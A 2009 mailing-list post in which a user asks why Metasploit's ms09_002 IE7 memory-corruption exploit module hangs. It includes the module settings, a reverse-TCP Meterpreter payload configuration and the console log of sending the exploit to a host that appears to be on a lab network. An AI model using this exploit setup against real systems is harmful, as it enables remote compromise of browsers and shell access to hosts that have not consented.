Metasploit mailing list archives
use of ms09_002 and xml_corruption modules
From: jeffs at speakeasy.net (jeffs)
Date: Wed, 01 Apr 2009 14:07:01 -0400
When I use either of these modules 'sploit just hangs on the last line -- am I to presume that means my version of IE7 is not vulnerable or do I perchance have a wrong setting below? thanks. Same result with xml_corruption.. Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH test no The URI to use for this exploit (default is random) Payload options (windows/reflectivemeterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.1.101 yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 msf exploit(ms09_002_memory_corruption) > exploit [*] Exploit running as background job. msf exploit(ms09_002_memory_corruption) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://0.0.0.0:8080/test [*] Local IP: http://192.168.1.101:8080/test [*] Server started. [*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.100:1704... <----- just hangs here
Current thread:
- use of ms09_002 and xml_corruption modules jeffs (Apr 01)
- use of ms09_002 and xml_corruption modules natron (Apr 01)